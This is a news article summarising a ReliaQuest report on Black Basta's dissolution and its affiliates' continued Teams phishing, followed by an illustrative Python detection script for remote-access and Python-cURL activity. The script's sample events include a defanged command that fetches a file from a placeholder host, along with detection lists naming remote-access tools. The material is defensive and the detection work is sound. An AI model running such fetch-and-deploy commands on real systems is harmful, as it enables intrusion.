IT Brief India - Technology news for CIOs & IT decision-makers

ReliaQuest details Black Basta’s legacy & rise of Teams phishing

Thu, 12th Jun 2025

ReliaQuest has released an in-depth report on the state of Black Basta, a former ransomware-as-a-service (RaaS) group, following the leak of the group's internal chat logs and its subsequent dissolution in February 2025.

The demise of Black Basta, a Russian-speaking criminal group previously active in naming up to 50 victims each month on its data-leak site, was triggered by a member known as ExploitWhispers. This individual leaked private chat logs on Telegram out of frustration with the group's decision to target Russian financial organisations, revealing the internal dynamics and operational methods of one of the most prolific RaaS groups to date.

Ongoing impact

Despite the cessation of activity under the Black Basta name, ReliaQuest's analysis shows that many of the group's phishing and intrusion tactics continue to be used. Former affiliates are operating with a consistent set of methods, relying heavily on large-scale email spam and Microsoft Teams phishing, and adapting to include techniques such as Python script execution to deliver payloads.

"Despite the group's dissolution, former members continue to use its tried-and-tested tactics, with mass email spam followed by Teams phishing remaining a persistent and effective attack method. 'New' ransomware groups like '3AM' are taking pages from Black Basta's playbook, particularly its signature phishing tactic," ReliaQuest notes in its assessment.

The organisation reported that Teams phishing attacks have maintained a steady pace since February 2025, with a marked increase in April when these incidents accounted for more than 35% of Black Basta-style activity targeting ReliaQuest's own customers. Half of these observed attacks originated from onmicrosoft[.]com domains, exploiting the ease of account creation and rotation on Microsoft's platform. The report suggests this trend is expected to continue.

The use of onmicrosoft[.]com domains remains the primary method for launching phishing campaigns via Teams, but the report highlights that efforts to compromise microsoft[.]com accounts, which give campaigns more credibility, are also growing. While such attacks are harder to carry out, their sophistication and risk could increase in the coming months.

Evolving methodology

"Recently, attackers have introduced Python script execution alongside these techniques, using cURL requests to fetch and deploy malicious payloads."

ReliaQuest documented a May 2025 case involving a manufacturing sector client, where attackers used a Teams phishing campaign from an onmicrosoft[.]com-based account to gain remote access via Quick Assist and AnyDesk. Python scripts were then deployed to download and execute a markdown file, enabling command and control (C2) communications. The attack was detected and contained before it could escalate.

Shifts among ransomware groups

The closure of Black Basta's data-leak site, paired with the continuation of its trademark tactics, suggests that its former members may have joined other RaaS collectives or formed new ones. Leaked chat logs indicate a substantial payment—between USD $500,000 and USD $600,000—by Black Basta's leader to the Cactus RaaS group, suggesting a relationship between the two. There was also a notable increase in named victim organisations on Cactus's data-leak site that coincided with Black Basta's closure.

Another scenario under consideration is that affiliates have transitioned to "Blacklock", a RaaS group previously known as Eldorado, which has named more than 50 organisations on its site. Eldorado's Russian-speaking origins and rebranding have led to speculation about links to Black Basta's membership.

Internal organisation and adaptation

ReliaQuest's analysis of the leaked chat logs provides insight into Black Basta's operational structure, which included defined roles such as intrusion specialists, campaign managers, and ransomware developers. The group also collaborated with external malware developers and used purchased access to tools like QakBot and DarkGate for campaigns, maintaining communication chains for technical support and updates.

ReliaQuest highlights the group's flexibility in tactics, warning that an overemphasis on defending against a single vector—such as brute-force attacks—could leave organisations exposed to more sophisticated phishing methods. The report urges a comprehensive, multi-layered defence posture.

Mitigating the threat

ReliaQuest emphasises the importance of user education to counter the social engineering techniques favoured by ransomware affiliates.

"To counter these threats, organisations should prioritise user education on phishing tactics. Informed and vigilant employees are often the first and most effective line of defence, stopping social engineering attacks before they succeed."

Recent case studies in sectors including finance, insurance, and construction indicated that previous staff training helped potential victims avoid compromise during coordinated phishing campaigns. Security teams received real-time alerts and took prompt action, benefiting from employee awareness programmes.

Additional recommendations for defence include restricting the use of personal Google accounts on company devices, implementing detection rules for unusual Python activity, monitoring for unauthorised remote-access tools, and deploying automated response playbooks for threat containment.
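As an added illustration of the detection recommendations above (unusual Python activity and unauthorised remote-access tools), the following script correlates the chain described in the May 2025 case: a remote-access tool launch followed shortly by a Python interpreter fetching content via cURL. It is example code written for this page, not ReliaQuest's detection logic; the event fields, binary names, hostnames, timestamps and the `hxxp://example.invalid` URL are all constructed.

```python
from datetime import datetime, timedelta

# Constructed sample process-creation events (not from the report). Fields loosely
# mirror an EDR "process create" record; hosts, paths, times and the URL are made up.
EVENTS = [
    {"ts": "2025-05-14T09:02:11", "host": "ws-17", "image": r"C:\Program Files\AnyDesk\AnyDesk.exe",
     "parent": "explorer.exe", "cmdline": "AnyDesk.exe"},
    {"ts": "2025-05-14T09:06:40", "host": "ws-17", "image": r"C:\Python312\python.exe",
     "parent": "cmd.exe", "cmdline": "python.exe -c \"import os; os.system('curl -o n.md hxxp://example.invalid/n.md')\""},
    {"ts": "2025-05-14T09:06:42", "host": "ws-17", "image": r"C:\Windows\System32\curl.exe",
     "parent": "python.exe", "cmdline": "curl -o n.md hxxp://example.invalid/n.md"},
    {"ts": "2025-05-14T10:15:00", "host": "ws-22", "image": r"C:\Python312\python.exe",
     "parent": "Code.exe", "cmdline": "python.exe build.py"},
]

# Assumed binary names; tune to the remote-support tooling your estate actually permits.
REMOTE_TOOLS = {"anydesk.exe", "quickassist.exe"}
PYTHON = {"python.exe", "pythonw.exe", "python3.exe"}
FETCH_MARKERS = ("curl", "http://", "https://", "hxxp://")


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events, window_minutes=30):
    """Return (rule, host, ts) findings; events may arrive unsorted."""
    findings, remote_seen = [], {}  # remote_seen: host -> last remote-tool launch time
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        img, parent, cmd = basename(ev["image"]), ev["parent"].lower(), ev["cmdline"].lower()
        if img in REMOTE_TOOLS:
            remote_seen[ev["host"]] = ts
            findings.append(("remote_access_tool", ev["host"], ev["ts"]))
        # Python whose command line names a downloader or URL is the "fetch and deploy" step.
        python_fetch = img in PYTHON and any(m in cmd for m in FETCH_MARKERS)
        # curl spawned by the interpreter is the same step observed from the child's side.
        curl_child = img == "curl.exe" and parent in PYTHON
        if python_fetch or curl_child:
            findings.append(("python_fetch", ev["host"], ev["ts"]))
            # Escalate when a remote-access tool started on this host shortly beforehand.
            last = remote_seen.get(ev["host"])
            if last is not None and ts - last <= timedelta(minutes=window_minutes):
                findings.append(("remote_tool_then_python_fetch", ev["host"], ev["ts"]))
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(*finding)
```

The benign `build.py` run on ws-22 produces no finding, while ws-17 yields the remote-tool launch, two fetch events and two correlated escalations within the 30-minute window.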

ReliaQuest's threat research team continues to monitor shifting TTPs (tactics, techniques, and procedures) among ransomware groups, rapidly integrating new indicators of compromise into its security platform and supporting customers with intelligence-driven threat hunting and response measures.

The report concludes that the tactics established by Black Basta are likely to remain prominent among ransomware operators, underscoring the need for ongoing vigilance, robust technical controls, and investment in cyber awareness among staff.
